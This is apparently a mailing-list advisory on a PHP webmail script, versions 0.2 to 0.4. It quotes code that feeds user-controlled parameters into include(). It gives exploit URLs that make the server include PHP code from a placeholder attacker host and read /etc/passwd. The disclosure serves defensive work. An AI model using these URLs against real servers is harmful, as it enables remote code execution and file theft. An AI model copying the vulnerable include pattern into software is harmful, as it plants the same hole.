('binary' encoding is not supported, stored as-is) Version : 0.2;0.3;0.4
Website : http://www.isoca.com/
Problems :Include file (local, remote)

Version: 0.2;0.3

File:
---------------------------------
email.php3 (version 0.2) ; email.php (version 0.3)
---------------------------------

PHP Code:
---------------------------------
[...]
require('emailreader.ini');
if ($login > "") {
 parse_str($param);
 include($cer_skin);
 include('email.inc');
 $mbox = openimap($server, $username, $password);
 $text = htmlspecialchars(get_part($mbox,$msgid, "TEXT/PLAIN"));
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/email.php?login=attacker&cer_skin=http://
[attacker]/code.php
-->
include http://[attacker]/code.php on remote server

---
include local file 
-->
http://[target]/email.php?login=attacker&cer_skin=/etc/passwd 
--------------------------------- 
Versions: 0.4
File: 
--------------------------------- 
webmail/lib/emailreader_execute_on_each_page.inc.php
---------------------------------
PHP Code:
--------------------------------- 
[...]
$param = imap_base64($login);
parse_str($param);
include($emailreader_ini);
include('lib/'.$server_type.'.inc.php');
include('skin/emailreaderskin_'.$lang.'.php');
[...]
--------------------------------- 
Exploit : 
--------------------------------- 
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=http://[attacker]/code.php
--> 
include http://[attacker]/code.php on remote server
---
include local file 
-->
http://[target]/webmail/lib/emailreader_execute_on_each_page.inc.php?
emailreader_ini=/etc/passwd 
---------------------------------
--
(if registers_global=ON)
--
--
magasmail.lt

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]